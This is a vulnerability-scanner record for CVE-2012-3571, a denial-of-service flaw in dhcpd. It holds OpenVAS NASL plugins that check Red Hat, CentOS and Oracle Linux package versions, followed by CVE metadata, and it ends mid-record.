ID OPENVAS:870801 Type openvas Reporter Copyright (c) 2012 Greenbone Networks GmbH Modified 2018-01-04T00:00:00
Description
Check for the Version of dhcp
###############################################################################
# OpenVAS Vulnerability Test
#
# RedHat Update for dhcp RHSA-2012:1140-01
#
# Authors:
# System Generated Check
#
# Copyright:
# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
include("revisions-lib.inc");
tag_insight = "The Dynamic Host Configuration Protocol (DHCP) is a protocol that allows
individual devices on an IP network to get their own network configuration
information, including an IP address, a subnet mask, and a broadcast
address.
A denial of service flaw was found in the way the dhcpd daemon handled
zero-length client identifiers. A remote attacker could use this flaw to
send a specially-crafted request to dhcpd, possibly causing it to enter an
infinite loop and consume an excessive amount of CPU time. (CVE-2012-3571)
Upstream acknowledges Markus Hietava of the Codenomicon CROSS project as
the original reporter of this issue.
Users of DHCP should upgrade to these updated packages, which contain a
backported patch to correct this issue. After installing this update, all
DHCP servers will be restarted automatically.";
tag_affected = "dhcp on Red Hat Enterprise Linux (v. 5 server)";
tag_solution = "Please Install the Updated Packages.";
if(description)
{
script_xref(name : "URL" , value : "https://www.redhat.com/archives/rhsa-announce/2012-August/msg00003.html");
script_id(870801);
script_version("$Revision: 8285 $");
script_tag(name:"last_modification", value:"$Date: 2018-01-04 07:29:16 +0100 (Thu, 04 Jan 2018) $");
script_tag(name:"creation_date", value:"2012-08-03 11:15:57 +0530 (Fri, 03 Aug 2012)");
script_cve_id("CVE-2012-3571");
script_tag(name:"cvss_base", value:"6.1");
script_tag(name:"cvss_base_vector", value:"AV:A/AC:L/Au:N/C:N/I:N/A:C");
script_xref(name: "RHSA", value: "2012:1140-01");
script_name("RedHat Update for dhcp RHSA-2012:1140-01");
script_tag(name: "summary" , value: "Check for the Version of dhcp");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
script_family("Red Hat Local Security Checks");
script_dependencies("gather-package-list.nasl");
script_mandatory_keys("ssh/login/rhel", "ssh/login/rpms");
script_tag(name : "affected" , value : tag_affected);
script_tag(name : "solution" , value : tag_solution);
script_tag(name : "insight" , value : tag_insight);
script_tag(name:"qod_type", value:"package");
script_tag(name:"solution_type", value:"VendorFix");
exit(0);
}
include("pkg-lib-rpm.inc");
release = get_kb_item("ssh/login/release");
res = "";
if(release == NULL){
exit(0);
}
if(release == "RHENT_5")
{
if ((res = isrpmvuln(pkg:"dhclient", rpm:"dhclient~3.0.5~31.el5_8.1", rls:"RHENT_5")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"dhcp", rpm:"dhcp~3.0.5~31.el5_8.1", rls:"RHENT_5")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"dhcp-debuginfo", rpm:"dhcp-debuginfo~3.0.5~31.el5_8.1", rls:"RHENT_5")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"dhcp-devel", rpm:"dhcp-devel~3.0.5~31.el5_8.1", rls:"RHENT_5")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"libdhcp4client", rpm:"libdhcp4client~3.0.5~31.el5_8.1", rls:"RHENT_5")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"libdhcp4client-devel", rpm:"libdhcp4client-devel~3.0.5~31.el5_8.1", rls:"RHENT_5")) != NULL)
{
security_message(data:res);
exit(0);
}
if (__pkg_match) exit(99); # Not vulnerable.
exit(0);
}
{"id": "OPENVAS:870801", "type": "openvas", "bulletinFamily": "scanner", "title": "RedHat Update for dhcp RHSA-2012:1140-01", "description": "Check for the Version of dhcp", "published": "2012-08-03T00:00:00", "modified": "2018-01-04T00:00:00", "cvss": {"score": 6.1, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=870801", "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "references": ["2012:1140-01", "https://www.redhat.com/archives/rhsa-announce/2012-August/msg00003.html"], "cvelist": ["CVE-2012-3571"], "lastseen": "2018-01-06T13:06:31", "viewCount": 2, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2018-01-06T13:06:31", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-3571"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310881457", "OPENVAS:1361412562310870804", "OPENVAS:881457", "OPENVAS:1361412562310881463", "OPENVAS:1361412562310870801", "OPENVAS:881463", "OPENVAS:870804", "OPENVAS:841095", "OPENVAS:1361412562310123848", "OPENVAS:1361412562310841095"]}, {"type": "nessus", "idList": ["ORACLELINUX_ELSA-2012-1141.NASL", "REDHAT-RHSA-2012-1141.NASL", "DEBIAN_DSA-2516.NASL", "REDHAT-RHSA-2012-1140.NASL", "CENTOS_RHSA-2012-1140.NASL", "ORACLELINUX_ELSA-2012-1140.NASL", "SL_20120803_DHCP_ON_SL5_X.NASL", "UBUNTU_USN-1519-1.NASL", "CENTOS_RHSA-2012-1141.NASL", "SL_20120803_DHCP_ON_SL6_X.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:37538"]}, {"type": "redhat", "idList": ["RHSA-2012:1141", "RHSA-2012:1185", "RHSA-2012:1200", "RHSA-2012:1140"]}, {"type": "centos", "idList": ["CESA-2012:1141", "CESA-2012:1140"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-1141", "ELSA-2012-1140", "ELSA-2013-0504"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:115094"]}, {"type": "amazon", "idList": ["ALAS-2012-115"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2519-2:7D25C", "DEBIAN:DSA-2516-1:B85CA", "DEBIAN:DSA-2519-1:B7532"]}, {"type": "ubuntu", "idList": ["USN-1519-1"]}, {"type": "freebsd", "idList": ["C7FA3618-D5FF-11E1-90A2-000C299B62E1"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:28333", "SECURITYVULNS:VULN:12491"]}, {"type": "gentoo", "idList": ["GLSA-201301-06"]}], "modified": "2018-01-06T13:06:31", "rev": 2}, "vulnersScore": 6.2}, "pluginID": "870801", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for dhcp RHSA-2012:1140-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Dynamic Host Configuration Protocol (DHCP) is a protocol that allows\n individual devices on an IP network to get their own network configuration\n information, including an IP address, a subnet mask, and a broadcast\n address.\n\n A denial of service flaw was found in the way the dhcpd daemon handled\n zero-length client identifiers. A remote attacker could use this flaw to\n send a specially-crafted request to dhcpd, possibly causing it to enter an\n infinite loop and consume an excessive amount of CPU time. (CVE-2012-3571)\n\n Upstream acknowledges Markus Hietava of the Codenomicon CROSS project as\n the original reporter of this issue.\n\n Users of DHCP should upgrade to these updated packages, which contain a\n backported patch to correct this issue. After installing this update, all\n DHCP servers will be restarted automatically.\";\n\ntag_affected = \"dhcp on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2012-August/msg00003.html\");\n script_id(870801);\n script_version(\"$Revision: 8285 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-04 07:29:16 +0100 (Thu, 04 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-03 11:15:57 +0530 (Fri, 03 Aug 2012)\");\n script_cve_id(\"CVE-2012-3571\");\n script_tag(name:\"cvss_base\", value:\"6.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"RHSA\", value: \"2012:1140-01\");\n script_name(\"RedHat Update for dhcp RHSA-2012:1140-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of dhcp\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"dhclient\", rpm:\"dhclient~3.0.5~31.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dhcp\", rpm:\"dhcp~3.0.5~31.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dhcp-debuginfo\", rpm:\"dhcp-debuginfo~3.0.5~31.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.5~31.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libdhcp4client\", rpm:\"libdhcp4client~3.0.5~31.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libdhcp4client-devel\", rpm:\"libdhcp4client-devel~3.0.5~31.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "naslFamily": "Red Hat Local Security Checks", "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T05:59:51", "description": "ISC DHCP 4.1.2 through 4.2.4 and 4.1-ESV before 4.1-ESV-R6 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a malformed client identifier.", "edition": 5, "cvss3": {}, "published": "2012-07-25T10:42:00", "title": "CVE-2012-3571", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 6.1, "vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-3571"], "modified": "2020-04-01T13:58:00", "cpe": ["cpe:/o:debian:debian_linux:6.0", "cpe:/a:isc:dhcp:4.2.4", "cpe:/o:canonical:ubuntu_linux:11.10", "cpe:/a:isc:dhcp:4.1-esv", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:11.04", "cpe:/a:isc:dhcp:4.2.1", "cpe:/a:isc:dhcp:4.2.0", "cpe:/a:isc:dhcp:4.2.2", "cpe:/o:debian:debian_linux:7.0", "cpe:/a:isc:dhcp:4.1.2", "cpe:/a:isc:dhcp:4.2.3"], "id": "CVE-2012-3571", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3571", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:a:isc:dhcp:4.1-esv:r1:*:*:*:*:*:*", "cpe:2.3:a:isc:dhcp:4.1-esv:r3:*:*:*:*:*:*", "cpe:2.3:a:isc:dhcp:4.2.1:-:*:*:*:*:*:*", "cpe:2.3:a:isc:dhcp:4.1-esv:r2:*:*:*:*:*:*", "cpe:2.3:a:isc:dhcp:4.2.3:p2:*:*:*:*:*:*", "cpe:2.3:a:isc:dhcp:4.2.3:p1:*:*:*:*:*:*", "cpe:2.3:a:isc:dhcp:4.1-esv:r5:*:*:*:*:*:*", "cpe:2.3:a:isc:dhcp:4.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:isc:dhcp:4.2.2:b1:*:*:*:*:*:*", "cpe:2.3:a:isc:dhcp:4.2.0:b1:*:*:*:*:*:*", "cpe:2.3:a:isc:dhcp:4.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:isc:dhcp:4.1-esv:r5_b1:*:*:*:*:*:*", "cpe:2.3:a:isc:dhcp:4.2.0:a1:*:*:*:*:*:*", "cpe:2.3:a:isc:dhcp:4.2.1:b1:*:*:*:*:*:*", "cpe:2.3:a:isc:dhcp:4.2.2:rc1:*:*:*:*:*:*", "cpe:2.3:a:isc:dhcp:4.1-esv:r5_rc1:*:*:*:*:*:*", "cpe:2.3:a:isc:dhcp:4.1-esv:r4:*:*:*:*:*:*", "cpe:2.3:a:isc:dhcp:4.2.0:b2:*:*:*:*:*:*", "cpe:2.3:a:isc:dhcp:4.2.0:-:*:*:*:*:*:*", "cpe:2.3:a:isc:dhcp:4.2.0:a2:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:11.04:*:*:*:*:*:*:*", "cpe:2.3:a:isc:dhcp:4.1-esv:r3_b1:*:*:*:*:*:*", "cpe:2.3:a:isc:dhcp:4.2.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:isc:dhcp:4.2.0:p1:*:*:*:*:*:*", "cpe:2.3:a:isc:dhcp:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe:2.3:a:isc:dhcp:4.1-esv:r5_rc2:*:*:*:*:*:*", "cpe:2.3:a:isc:dhcp:4.1-esv:-:*:*:*:*:*:*", "cpe:2.3:a:isc:dhcp:4.2.3:-:*:*:*:*:*:*", "cpe:2.3:a:isc:dhcp:4.2.2:-:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:11.10:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2018-01-11T11:07:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3571"], "description": "Check for the Version of dhclient", "modified": "2018-01-09T00:00:00", "published": "2012-08-03T00:00:00", "id": "OPENVAS:881457", "href": "http://plugins.openvas.org/nasl.php?oid=881457", "type": "openvas", "title": "CentOS Update for dhclient CESA-2012:1140 centos5 ", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for dhclient CESA-2012:1140 centos5 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Dynamic Host Configuration Protocol (DHCP) is a protocol that allows\n individual devices on an IP network to get their own network configuration\n information, including an IP address, a subnet mask, and a broadcast\n address.\n\n A denial of service flaw was found in the way the dhcpd daemon handled\n zero-length client identifiers. A remote attacker could use this flaw to\n send a specially-crafted request to dhcpd, possibly causing it to enter an\n infinite loop and consume an excessive amount of CPU time. (CVE-2012-3571)\n \n Upstream acknowledges Markus Hietava of the Codenomicon CROSS project as\n the original reporter of this issue.\n \n Users of DHCP should upgrade to these updated packages, which contain a\n backported patch to correct this issue. After installing this update, all\n DHCP servers will be restarted automatically.\";\n\ntag_affected = \"dhclient on CentOS 5\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2012-August/018783.html\");\n script_id(881457);\n script_version(\"$Revision: 8336 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-09 08:01:48 +0100 (Tue, 09 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-03 11:16:44 +0530 (Fri, 03 Aug 2012)\");\n script_cve_id(\"CVE-2012-3571\");\n script_tag(name:\"cvss_base\", value:\"6.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"CESA\", value: \"2012:1140\");\n script_name(\"CentOS Update for dhclient CESA-2012:1140 centos5 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of dhclient\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"dhclient\", rpm:\"dhclient~3.0.5~31.el5_8.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dhcp\", rpm:\"dhcp~3.0.5~31.el5_8.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.5~31.el5_8.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libdhcp4client\", rpm:\"libdhcp4client~3.0.5~31.el5_8.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libdhcp4client-devel\", rpm:\"libdhcp4client-devel~3.0.5~31.el5_8.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.1, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:36:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3571"], "description": "Oracle Linux Local Security Checks ELSA-2012-1140", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123848", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123848", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2012-1140", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2012-1140.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123848\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:09:22 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2012-1140\");\n script_tag(name:\"insight\", value:\"ELSA-2012-1140 - dhcp security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2012-1140\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2012-1140.html\");\n script_cve_id(\"CVE-2012-3571\");\n script_tag(name:\"cvss_base\", value:\"6.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"dhclient\", rpm:\"dhclient~3.0.5~31.el5_8.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"dhcp\", rpm:\"dhcp~3.0.5~31.el5_8.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.5~31.el5_8.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libdhcp4client\", rpm:\"libdhcp4client~3.0.5~31.el5_8.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libdhcp4client-devel\", rpm:\"libdhcp4client-devel~3.0.5~31.el5_8.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:38:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3571"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2012-08-03T00:00:00", "id": "OPENVAS:1361412562310870801", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870801", "type": "openvas", "title": "RedHat Update for dhcp RHSA-2012:1140-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for dhcp RHSA-2012:1140-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2012-August/msg00003.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870801\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-03 11:15:57 +0530 (Fri, 03 Aug 2012)\");\n script_cve_id(\"CVE-2012-3571\");\n script_tag(name:\"cvss_base\", value:\"6.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name:\"RHSA\", value:\"2012:1140-01\");\n script_name(\"RedHat Update for dhcp RHSA-2012:1140-01\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'dhcp'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_5\");\n script_tag(name:\"affected\", value:\"dhcp on Red Hat Enterprise Linux (v. 5 server)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"The Dynamic Host Configuration Protocol (DHCP) is a protocol that allows\n individual devices on an IP network to get their own network configuration\n information, including an IP address, a subnet mask, and a broadcast\n address.\n\n A denial of service flaw was found in the way the dhcpd daemon handled\n zero-length client identifiers. A remote attacker could use this flaw to\n send a specially-crafted request to dhcpd, possibly causing it to enter an\n infinite loop and consume an excessive amount of CPU time. (CVE-2012-3571)\n\n Upstream acknowledges Markus Hietava of the Codenomicon CROSS project as\n the original reporter of this issue.\n\n Users of DHCP should upgrade to these updated packages, which contain a\n backported patch to correct this issue. After installing this update, all\n DHCP servers will be restarted automatically.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"dhclient\", rpm:\"dhclient~3.0.5~31.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dhcp\", rpm:\"dhcp~3.0.5~31.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dhcp-debuginfo\", rpm:\"dhcp-debuginfo~3.0.5~31.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.5~31.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libdhcp4client\", rpm:\"libdhcp4client~3.0.5~31.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libdhcp4client-devel\", rpm:\"libdhcp4client-devel~3.0.5~31.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:38:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3571"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-08-03T00:00:00", "id": "OPENVAS:1361412562310881457", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881457", "type": "openvas", "title": "CentOS Update for dhclient CESA-2012:1140 centos5", "sourceData": "###############################################################################\n# OpenVAS Vulnerability 